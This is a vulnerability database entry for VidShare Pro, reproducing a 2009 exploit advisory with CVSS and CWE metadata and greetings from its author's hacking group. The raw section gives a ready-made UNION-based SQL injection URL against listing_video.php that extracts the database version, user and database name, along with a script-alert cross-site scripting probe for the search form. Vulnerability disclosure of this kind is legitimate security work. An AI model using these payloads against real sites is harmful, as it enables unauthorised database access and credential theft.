VidShare Pro MULTIPLE REMOTE VULNERABILITIES

vendor:

VidShare Pro

by:

Snakespc

9,3

CVSS

HIGH

SQL Injection and XSS

89 (SQL Injection) and 79 (XSS)

CWE

Product Name: VidShare Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

VidShare Pro MULTIPLE REMOTE VULNERABILITIES

VidShare Pro is prone to multiple remote vulnerabilities, including SQL injection and cross-site scripting. An attacker can exploit these issues to manipulate SQL queries, access or modify data, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Users should never follow links from untrusted sources and should always use the latest version of all software.

Source

Exploit-DB raw data:

-------------------------AllaH AkbaR-------------------------------
VidShare Pro MULTIPLE REMOTE VULNERABILITIES	
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Mail: snakespc@gmail.com
Site:http://www.snakespc.com/sc/index.php
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s 
-------------------------SNAKES TEAM-------------------------------------

Script:VidShare Pro   www.omnisoftsol.com

Demo:http://www.omnisoftsol.com/index.php?option=com_content&task=view&id=7&Itemid=28

(listing_video.php)
--------------------------SNAKES TEAM------------------------------------
Exploit:SQL
--------
Demo:
http://demo.omnisoftsol.com/listing_video.php?catid=2+UNION%20SELECT%201,2,3,4,CHAR(83,%20110,%2097,%20107,%20101,%20115,%2084,%20101,%2097,%2077),6,7,8,9,10,11,concat(@@version,0x3a,user(),0x3a,database()),13,14,15,16,17,18--

(XSS)<----Search form---->

<script>alert(1954)</script>
-------------------------SNAKES TEAM-------------------------------------
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::
Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::
THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
--------------------------SNAKES TEAM------------------------------------
ALL www.SnakespC.com/sc>>>> (  Members )
Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-19]